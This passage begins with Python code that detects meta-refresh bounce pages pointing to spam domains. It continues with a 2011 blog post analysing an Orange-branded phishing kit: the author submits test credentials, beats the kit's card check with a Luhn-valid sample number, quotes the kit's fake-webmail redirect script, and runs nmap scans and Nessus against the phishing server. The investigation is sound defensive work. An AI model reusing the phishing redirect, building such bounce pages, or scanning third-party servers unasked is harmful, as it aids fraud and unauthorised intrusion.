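        m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
        if m:
            self.delay, self.target = int(m.group(1)), m.group(2)


def redirect_target(html):
    """Return the meta refresh URL of a page, or None when it has none."""
    finder = RefreshFinder()
    finder.feed(html)
    return finder.target


def scan_folder(folder):
    """Group the bounce pages of a folder by the domain they redirect to.

    A file is reported when it carries a meta refresh or the lure sentence; a lure
    page without any redirect lands under the key None so it is not overlooked.
    """
    by_domain = defaultdict(list)
    for name in sorted(os.listdir(folder)):
        if not name.lower().endswith((".htm", ".html")):
            continue
        with open(os.path.join(folder, name), encoding="utf-8", errors="replace") as fh:
            html = fh.read()
        target = redirect_target(html)
        if target is None and LURE not in html.lower():
            continue
        by_domain[urlsplit(target).hostname if target else None].append(name)
    return dict(by_domain)


def build_sample_folder():
    """Constructed stand-in for the compromised wp-content folder.

    File names and redirect targets are those quoted in the post; zzz.htm carries the
    lure without a redirect, and readme.htm is a harmless file that must not be reported.
    """
    folder = tempfile.mkdtemp(prefix="bounce_")
    pages = {
        "1111.htm": "http://caretabgalaxy.com/",
        "domvkf.htm": "http://wikimedicare.com/",
        "dttnba.htm": "http://gyuntere.ru/",
        "mmarfd.htm": "http://ommatorepillstablets.net/",
    }
    for name, url in pages.items():
        html = (f'<html><head><meta http-equiv="refresh" content="4; url={url}"></head>'
                f"<body>You are here because {LURE} to try our free trial.</body></html>")
        with open(os.path.join(folder, name), "w", encoding="utf-8") as fh:
            fh.write(html)
    with open(os.path.join(folder, "zzz.htm"), "w", encoding="utf-8") as fh:
        fh.write(f"<html><body>You are here because {LURE}.</body></html>")
    with open(os.path.join(folder, "readme.htm"), "w", encoding="utf-8") as fh:
        fh.write("<html><body>Theme option documentation.</body></html>")
    return folder


if __name__ == "__main__":
    for domain, files in scan_folder(build_sample_folder()).items():
        print(domain, "<-", ", ".join(files))
```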

19 August 2011, 22:05

 

This time, I preferred not to evaluate the effectiveness of the security products at the very moment the threat reached the machine, but some time afterwards...

Here is the email, fairly well done by the way:

email_maghegy.com_130811-copie-1.JPG

Thunderbird 64 (Miramar) had warned of a "scam" risk for this email.

But what do the user-side protections, at the browser level, give 6 days after the email was received?

- Internet Explorer 9: OK, warning

- Opera 11.50: OK, warning

- Netcraft: OK, warning

- Firefox 5: no alert

- Safari 5: no alert

- Chrome 13: no alert

- WOT: no alert

- Webutation: no alert...

 

For Safari:

site_Safari_OK.jpg

For Chrome:

site_Chrome_OK.jpg

And most interesting, 64-bit Firefox 4.0b12pre (with WOT, Webutation, Netcraft...):

site_FF64_OK.jpg

Webutation, even more explicit ("all is well"):

site_webuptation_OK.JPG

Fortunately, Netcraft reacts:

site_netcraft_alert.pg-copie-1.jpg

 

------------------------------------------------------------------

And now, what if I try to follow the deception all the way through?

Let's fill in the form, email address and password, and submit...

Firebug clearly shows where the password goes:

login_Firebug.jpg

The page that follows the fraudulent submission of the user credentials is quite interesting!

site-page2_FF64_OK.jpg

Could this be linked to the current fake-invoice fraud campaign?

At the network level, the traffic is also quite revealing:

site-page2_firebug.jpg

Various requests to maghegy.com do not succeed... yet the phishing kit seems to work overall.

It is notable that the image with all the bank logos (surely there to reassure the user, like "fake partnerships") comes from:

http://nsa25.casimages.com/img/2011/04/09//110409011725248635.jpg

The server hosting this image is at OVH...

Other elements (especially images) are fetched from places other than Orange.fr... for example the orange character: http://img.woopic.com/common/g8/img/new_user_welcome.gif

Let's play the game to the end... so I fill in the form. Strange, I am asked for both my card number AND my account number!

Note that the form is so well made that I cannot enter completely made-up numbers:

site-page2_remplissage-detect.jpg

In fact, it is the Luhn check that is applied... (see http://www.thetaoofmakingmoney.com/2007/04/12/324.html)

So to get past the check, I take the example 4552 7204 1234 5677.
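For reference, an added Python implementation (not from the post) of the Luhn check the kit performs, run on the example number above. The check only catches typing errors (a wrong digit, two adjacent digits swapped); a number passing it says nothing about whether the card exists, which is why the kit's "validation" is no obstacle.

```python
def luhn_sum(digits):
    """Luhn sum of a string of digits: every second digit from the right is doubled,
    and a doubled value above 9 has 9 subtracted (same as summing its two digits)."""
    total = 0
    for position, char in enumerate(reversed(digits)):
        value = int(char)
        if position % 2 == 1:
            value = value * 2 - 9 if value > 4 else value * 2
        total += value
    return total


def luhn_valid(number):
    """True when number (spaces and dashes allowed) has a correct Luhn check digit."""
    digits = number.replace(" ", "").replace("-", "")
    if not digits.isdigit() or len(digits) < 2:
        return False
    return luhn_sum(digits) % 10 == 0


EXAMPLE = "4552 7204 1234 5677"  # the number used above to satisfy the kit's check

if __name__ == "__main__":
    print(EXAMPLE, "passes Luhn:", luhn_valid(EXAMPLE))
    # The check exists to catch typing errors, which is all it was designed for:
    print("single wrong digit 4552 7204 1234 5678:", luhn_valid("4552 7204 1234 5678"))
    print("adjacent digits swapped 4552 7204 1234 5767:", luhn_valid("4552 7204 1234 5767"))
```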

Finally, once the form is accepted, clicking "Valider" sends a POST request, still to the same domain:

site-page2_POST.jpg

The form data is clearly visible, and it is the "xeon.php" page that collects everything.

In a fairly classic but proven way, this POST request is followed by a redirect to the REAL Orange site (id.orange.fr).

 

And finally, if one tries to access the root of the phishing environment, the server's HTML response is designed to return a genuine-looking fake Orange Webmail page:

<html>
<script type="text/javascript">
echo = "logins2.html?-http/webmail1e.orange.fr/webmail/fr_FR/inbox.html?w=0&FromSubmit=true?rpsnv=11&ct=1258553363&rver=6.0.5285.0&wp=MBI&wreply=http:%2F";
self.location.replace(echo);
window.location = echo;
</script>
</html>

 

------------------------------------------------------------------------------------------------------

And what about the server, you may ask?

An old reflex leads me to try an nmap -O --osscan-guess. The result is rather intriguing:

 

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-20 00:01 Paris, Madrid (heure d'été)
Nmap scan report for maghegy.com (46.252.201.1)
Host is up (0.040s latency).
rDNS record for 46.252.201.1: n1nlhg286c1286.shr.prod.ams1.secureserver.net
Not shown: 986 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
50000/tcp closed ibm-db2
50001/tcp closed unknown
50002/tcp closed iiimsf
50003/tcp closed unknown
50006/tcp closed unknown
50300/tcp closed unknown
50389/tcp closed unknown
50500/tcp closed unknown
50636/tcp closed unknown
50800/tcp closed unknown
Device type: general purpose|WAP|firewall|phone|printer
Running (JUST GUESSING): OpenBSD 4.X (95%), Linux 2.6.X|2.4.X (91%), Linksys Linux 2.4.X (91%), HID embedded (90%), Nokia Linux 2.6.X (89%), Netgear embedded (88%), Asus Linux 2.6.X (87%), Epson embedded (87%)
Aggressive OS guesses: OpenBSD 4.3 (95%), Linux 2.6.18-8.el5 (Red Hat Enterprise  Linux 5) (91%), Linux 2.6.20 (91%), Linux 2.6.20 (Ubuntu, x86_64) (91%), Linux 2.6.22 (91%), Linux 2.6.22 (Ubuntu, x86) (91%), OpenWrt White Russian 0.9 (Linux  2.4.30) (91%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (91%), HID EdgePlus Solo ES400 firewall (90%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.80 seconds

 

BSD, Linux, a WiFi access point?... all hosted on a prod.ams1.secureserver.net? What is that... (WTH? ;) some will understand).

And still with Nmap, service detection raises my eyebrows:

PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 5.1 (protocol 2.0)
80/tcp open http Apache httpd
443/tcp open http Apache httpd

OpenSSH 5.1? Even on machines said to be secured, I almost never come across it...!

So I am going to try signature-based identification: HTTPrecon.

serveur_empreinte_HTTP.jpg

Bingo, Apache 2.2.8!

I have seen worse, but it is already a first entry point that may have been used to compromise the server. Nessus is running...
